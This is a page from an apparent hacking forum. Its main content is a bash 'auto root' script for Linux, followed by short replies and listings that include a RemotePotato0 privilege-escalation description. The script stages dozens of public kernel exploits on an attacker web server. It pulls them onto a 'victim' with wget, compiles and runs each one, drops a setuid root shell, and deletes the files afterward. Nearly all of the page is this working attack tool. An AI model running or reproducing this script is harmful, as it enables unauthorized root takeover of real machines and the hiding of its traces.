          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c

          # Getting 32-bit only exploit to lin_x86 directory
          cd /var/www/html/exploits/lin_x86/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86/local/9542.c

          # Getting the compressed exploits to sploits directory
          cd /var/www/html/exploits/sploits

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/39772.zip
          sudo wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/33395.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/40489.zip

          # Getting CVE-2016-2384 exploit to gitex directory 
          cd /var/www/html/exploits/gitex

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gitaddress/poc.c
          sudo wget --no-check-certificate $gitaddress/poc.py
      }

      function valid_ip()
      {
          if ! [ "$2" ]; then
              echo -e "${red}${bold}IP Not Provided, Please provide an IP"
          else
              if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

                  for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
                  do
                    (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
                  done
              else
                  echo -e "${light_green}========================================"
                  echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
                  echo -e "========================================"
                  exit 1;
              fi
          fi
      }

      #gaddress=$1'/exploits'
      #saddress=$1'/exploits'
      #gitaddress=$1'/exploits/gitex'
      function exploiter(){

          checkroot() {
              if [ $(id -u) == 0 ]; then
              echo
              echo -e "${light_red}Successfully R00T(ed).. have fun :)"
              id=$(id)
              echo -e "${light_red}ID     => ${light_green}" $id
              who=$(whoami)
              echo -e "${light_red}WHOAMI => ${light_green}" $who
              exit
              else
              echo ""
              echo -e "${light_red}R00Ting.. ${light_green}"
              sleep 1
              fi
          }
          ccmpl(){
              gcc exploit.c -o exploit -lutil -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -m32 -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lkeyutils -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -pthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -static -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -fPIC -shared -o exploit exploit.c -ldl -w
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -O2 exploit.c
              gcc -O2 -fomit-frame-pointer exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c -static -O2
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -pthread exploit.c -o exploit -lcrypt
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -m64 -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
          }
          shcmpl(){
              bash exploit.sh
              rm exploit.sh
              rm *.c
              checkroot;
          }
          pycmpl(){
              python exploit.py
              rm exploit.py
              rm *.c
              checkroot;
          }
          echo -e "${light_red}Auto R00Ting started...${light_green}"

          checkroot;
          #c
          wget --no-check-certificate $gaddress/linux/local/2031.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/17391.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/18411.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33321.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35161.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5092.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8572.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86/local/9542.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25202.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33322.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40812.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/37292.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2013.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5093.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8673.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/10613.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40003.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2004.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15704.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25444.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/30604.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33824.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41994.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2005.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15285.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41995.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2006.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40616.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33336.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39166.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41886.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/1397.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/27297.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39277.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/718.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8678.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41458.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40839.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35370.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/38390.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39230.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/42183.c -O exploit.c
          ccmpl;

          #sh
          wget --no-check-certificate $gaddress/linux/local/2011.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/8478.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/10018.sh -O exploit.sh
          shcmpl;

          #py
          wget --no-check-certificate $gaddress/linux/local/9844.py -O exploit.py
          pycmpl;
          wget --no-check-certificate $gaddress/linux/local/12130.py -O exploit.py
          pycmpl;

          #txt
          #platforms/linux/local/9191.txt
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/39772.txt
          wget --no-check-certificate $saddress/bin-sploits/39772.zip
          cd 39772
          unzip 39772.zip
          tar -xf exploit.tar
          cd ebpf_mapfd_doubleput_exploit
          bash compile.sh
          ./hello
          ./doubleput
          ./suidhelper
          cd ..
          rm -rf ebpf_mapfd_doubleput_exploit
          rm -rf exploit.tar
          checkroot;
          tar -xf crasher.tar
          cd ebpf_mapfd_doubleput_crasher
          bash compile.sh
          ./doubleput
          cd ..
          rm -rf ebpf_mapfd_doubleput_crasher
          rm -rf 39772
          rm -rf 39772.zip
          checkroot;
          #platforms/linux/local/23674.txt
          smbmount --version
          ls -l /usr/bin/smbmount
          ls -l /usr/bin/smbmnt
          echo "main(){setuid(0);setgid(0);system("/bin/bash");}" > a.c
          make a
          cc a.c -o a
          chmod +s a
          share:/etc/samba/smb.conf
          /etc/samba/smb.conf
          [share]
          path = /data/share
          writable = no
          locking = no
          public = yes
          guest ok = yes
          comment = Share
          ls -l a
          ls -l pokus/a
          id
          checkroot;
          #platforms/linux/local/29714.txt
          wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          tar -zxf 29714.tgz
          cd exploit
          make
          make install
          cd ..
          rm -rf exploit
          rm -rf 29714.tgz
          checkroot;
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/33395.txt
          wget $saddress/bin-sploits/33395.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          checkroot;
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          #platforms/linux/local/40489.txt
          wget --no-check-certificate $saddress/bin-sploits/40489.zip
          unzip 40489.zip
          cd 40489
          bash compile.sh
          ./pwn
          ./enjoy
          cd ..
          rm -rf 40489
          rm -rf 40489.zip
          checkroot;
          #platforms/linux/local/41770.txt
          # #!/bin/bash
          # (./ProcReadHelper /proc/$$/syscall) &
          # sleep 1
          # exec /usr/bin/passwd
          # #!/bin/bash
          # echo "Current pid is $$"
          # (sleep 10; echo 127 ) > /proc/$$/coredump_filter &
          # sleep 5
          # exec /usr/bin/passwd
          # static ssize_t mem_read(struct file * file, char __user * buf,
          #                         size_t count, loff_t *ppos) {
          #     if (file->private_data != (void*)((long)current->self_exec_id))
          #         goto out_put;
          # #!/bin/bash
          # (sleep 3; echo 15) > /proc/$$/oom_adj &
          # exec /usr/bin/passwd
          # checkroot;
          #platforms/linux/local/38559.txt
          rmmod b43
          modprobe b43 fwpostfix=AA%xBB
          dmesg
          checkroot;
          #platforms/linux/local/41999.txt
          wget --no-check-certificate $gitaddress/poc.c -O poc.c
          gcc poc.c -masm=intel
          ./a.out 0
          checkroot;
          ./a.out 1
          checkroot;
          ./a.out 2
          checkroot;
          ./a.out 3
          checkroot;
          ./a.out 4
          checkroot;
          ./a.out 5
          checkroot;
          ./a.out 6
          checkroot;
          ./a.out 7
          checkroot;
          ./a.out 8
          checkroot;
          ./a.out 9
          checkroot;
          ./a.out 10
          checkroot;
          rm a.out
          rm poc.c
          wget --no-check-certificate $gitaddress/poc.py -O poc.py
          python poc.py
          checkroot;
          rm poc.py
          rm a.out
          rm exploit
          
          echo -e "${light_red}Srry.. I tried hard, but no luck this time.. Wait for update :("
          exit 1;
      }


      if ! [ "$1" ] || [ "$1" == '-h' ]  || [ "$1" == '--help' ] ; then #|| ! [ "$2" ]; then
          lauto_root
          desc
      fi

      if [ "$1" == '-a' ] || [ "$1" == '--arsenal' ] ; then
          lauto_root
          sleep 2 
          echo -e "\n${light_green}=================================="
          echo -e "#   ${light_red}Initiating Arsenal script   ${light_green} #"
          echo -e "==================================\n"
          # original line gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms'
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          # original line saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-6074'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308'
          local_dir
          arsenal
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Local Arsenal Set..  ${light_green}#"
          echo -e "==========================\n"
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Starting Apache2     ${light_green}#"
          echo -e "==========================\n"
          /bin/bash -i /etc/init.d/apache2 start
          /bin/bash -i /etc/init.d/apache2 status
          echo -e "${light_green}=================================="
          echo -e "#    ${light_red}Run Exploiter on Victim     ${light_green}#"
          echo -e "==================================\n"

          exit 1;
      fi 

      if [ "$1" == '-l' ] || [ "$1" == '--Lroot' ] ; then
          lauto_root
          if ! [ "$2" ]; then
              echo -e "\n${light_red}No IP address provided!!!\n"
              exit 1;
          else     
              ip=$2
          fi

          if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

              for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
              do
                (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
              done
          else
              echo -e "${light_green}========================================"
              echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
              echo -e "========================================\n"
          fi    

          sleep 2 
          echo -e "${light_green}=================================="
          echo -e "#   ${light_red}Initiating Local Exploiter   ${light_green}#"
          echo -e "==================================\n"
          gaddress='http://'${ip}'/exploits'
          saddress='http://'${ip}'/exploits'
          gitaddress='http://'${ip}'/exploits/gitex'
          exploiter
          exit 1;
      fi

      if [ "$1" == '-r' ] || [ "$1" == '--Rroot' ] ; then
          lauto_root
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          sleep 2 
          echo -e "${light_green}==================================="
          echo -e "#   ${light_red}Initiating Remote Exploiter   ${light_green}#"
          echo -e "===================================\n"
          exploiter
          exit 1;
      fi


       

      thanks for share

      Excellent a fellow bash coder, add me => MODERATED BY ADMIN (jabber)

      Ive got some "HQ" stuff to show you.

      Edited by dEEpEst
      No emails in public

      Share this post

      Link to post
      Share on other sites

      bash818    227

      bash818
      Posted
      10 hours ago, bash818 said:

      Excellent a fellow bash coder, add me => MODERATED BY ADMIN (jabber)

      Ive got some "HQ" stuff to show you.

      Its a jabber..

      Share this post

      Link to post
      Share on other sites

      dEEpEst    34,734

      dEEpEst
      Staff
      Posted
      hace 2 horas, bash818 dijo:

      Its a jabber..

      @bash818 You can not put emails in the forum, or jabbers or anything similar. If you want to contact him use the private message.
      You should know the rules.:close_tema:

      Share this post

      Link to post
      Share on other sites
      Guest
      This topic is now closed to further replies.
      Go To Topic Listing

      • Similar Content

        • itsMe
          RemotePotato0: Windows Privilege Escalation from User to Domain Admin
          By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. RemotePotato0
          Just another “Won’t Fix” Windows Privilege Escalation from User to Domain Admin.
          RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.
          Briefly:
          It abuses the DCOM activation service and triggers an NTLM authentication of the user currently logged on in the target machine. It is required you have a shell in session 0 (e.g. WinRm shell or SSH shell) and that a privileged user is logged on in session 1 (e.g. a Domain Admin user). Once the NTLM type1 is triggered we set up a cross-protocol relay server that receives the privileged type1 message and relays it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end, you can set up a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • itsMe
          Become a Master Commander and a Linux Power User
          By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Learn to use Linux comfortably
          What you'll learn
              Basic Linux Command
              Intermediate Linux Command
              About Flie Permissions
              About Disk management
              Networking on Linux
              Sofware Management
              System Administration
              Bash Shell Scripting
              Create A Project
          Requirements
              Nothing about Linux
              Computer Basic Knowledge
              Internet access
          Description
          Linux is a family of open-source Unix-like operating systems based on the Linux kernel, an operating system kernel first released on September 17, 1991, by Linus Torvalds. Linux is typically packaged in a Linux distribution.
          Installing and using Linux on your system is the easiest way to avoid viruses and malware. ... However, users can install ClamAV antivirus software in Linux to further secure their systems. The reason for this higher level of security is that since Linux is open-source software, the source code is available for review
          Linux plays an incredibly important part in the job of cybersecurity professional. Specialized Linux distributions such as Kali Linux are used by cybersecurity professionals to perform in-depth penetration testing and vulnerability assessments, as well as provide forensic analysis after a security breach.
          What will students learn in your course?
              Basic Linux Command
              Intermediate Linux Command
              About Flie Permissions
              About Disk management
              Networking on Linux
              Sofware Management
              System Administration
              Bash Shell Scripting
              Create A Project
          Are there any course requirements or prerequisites?
              Nothing about Linux
              Computer Basic Knowledge
              Internet access
          Who are your target students?
              Learn to use Linux comfortably
              Create a project with Linux operating system
          It's hard to say, but I have a feeling Linux isn't going anywhere, at least not in the foreseeable future: The server industry is evolving, but it's been doing so forever. ... Linux still has a relatively low market share in consumer markets, dwarfed by Windows and OS X. This will not change anytime soon.
          Linux professionals are well-positioned in the job market, with 44% of hiring managers saying there is high possibility for them to hire a candidate with Linux certification, and 54% expecting either certification or formal training of their system admin candidates. ... Systems Administration.
          The Linux job market is very hot right now, particularly for those with system administration skills. Everybody is looking for Linux talent. Recruiters are knocking down the doors of anybody with Linux experience as the demand for Linux professionals is increasing day by day.
          Who this course is for:
              Learn to use Linux comfortably
              Create a project with Linux operating system
          Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.  
        • itsMe
          An Introduction to Ethical Hacking with Kali Linux
          By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. What you'll learn
              Ethical Hacking
              Kali Linux
              Information Gathering
              Vulnerability Analysis
              Web Application Analysis
              Exploiting Vulnerabilities
              DNS Analysis
              IDS and IPS Detection
              Live Host Identification
              Network and Port Scanners
              OSSINT
              Enum4Linux
              Dmitry
              Recon-ng
              Sparta
              Nikto
              Unix-privsec-check
              Wpscan
              Burp Suite
              Wfuzz
              Commix
              Sqlmap
              Metasploit
              nmap
          Requirements
              A basic understanding of Linux
          Description
          Learn ethical hacking through Kali Linux, one of the leading Computer Security operating systems! In this course, you will learn how to gather information, detect vulnerabilities, and exploit them using tools in Kali Linux. This course will give you all of the tools you need to be able to test your own servers and applications for vulnerabilities.
          Computer Security is one of the fastest-growing fields in tech, and ethical hacking is one of the best skills to learn in the field. With a new attack being completed every 39 seconds, it is essential that security experts are equipped with the most powerful tools for the job. The tools in Kali Linux are commonly used by attackers and defenders to help secure their systems. Learning these tools will allow you to secure your system before the attackers get to it!
          You will learn:
              DNS Analysis
              IDS and IPS Detection
              Live Host Identification
              nmap
              OSSINT
              Enum4Linux
              Dmitry
              Recon-ng
              Sparta
              Nikto
              Unix-privesc-check
              wpscan
              Burp Suite
              wfuzz
              commix
              Sqlmap
              Metasploit
          You will learn how to exploit common vulnerabilities in Linux and Windows, as well as how to find common vulnerabilities in web apps such as command injections, and SQL injections.
          I am currently working in the Computer Security field, which means that I am knowledgable in the most current attacks and tools used in the field. I have worked on many large projects which involve discovering vulnerabilities, so most of my work is focused on the detection and research of vulnerabilities in live, in-market applications. I will show you how to use Kali Linux to be able to detect these types of vulnerabilities in your live applications.
          Don't get hacked, learn Kali Linux today, and gain a set of skills that will add major value to your career!
          Who this course is for:
              Computer users who look to expand their understanding of ethical hacking and computer security
          Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.
          Hidden Content
          Give reaction to this post to see the hidden content.
        • itsMe
          Linux Command Line basics to Advance
          By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. What you'll learn
              you will understand the fundamentals of the Linux operating system and be able to apply that knowledge in a practical and useful manner
          Requirements
              Any Linux distribution installed on your computer ( even on a virtual machine)
          Description
          Become a real Linux user and advance your Career. Learning the Linux Command Line will take you FAR! Learn to appreciate the power of the Linux command line Understand the structure of the Linux File System. Knowledge of the Linux command line is critical for anyone who uses this open-source operating system. For many tasks, it's more efficient and flexible than a graphical environment. For administrators, it plays a vital role in configuring permissions and working with files. In this course discusses the basics of working with the Linux command line using the Bash shell, focusing on practical Linux commands with examples that help you navigate through the file and folder structure, edit text, and set permissions and also learn some of the common command-line tools, such as grep, awk, and sed, and command-line apps such as the nano and Vim text editors. The course wraps up with a look at how to install and update software with a package manager.
           The following topics are included.
           ·         What is the Linux command line?
          ·         Writing Linux commands at the prompt
          ·         Finding help for Linux commands
          ·         Copying, moving, and deleting files and folders
          ·         Configuring user roles and file permissions
          ·         Using pipes to connect commands
          ·         Searching and editing text
          ·         Finding system hardware and disk information
          ·         Installing and updating software
          Linux backup
              How to backup Linux using DD with hands On
              How to use Rsync with lot of examples.
           How to setup OWNCLOUD
              Introduction
              initial server setup for Centos 7
              Install Linux, Apache, MySQL, PHP (LAMP) stack On CentOS 7
              Install and Configure ownCloud on CentOS 7
          Who this course is for:
              anyone who wants to get started with Linux. existing Linux users or learners who wants to be effective at using the Linux command Line. windows or mac users who wants to migrate to Linux but are afraid to make the move ! aspiring Linux system administrators
          Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.
          Hidden Content
          Give reaction to this post to see the hidden content.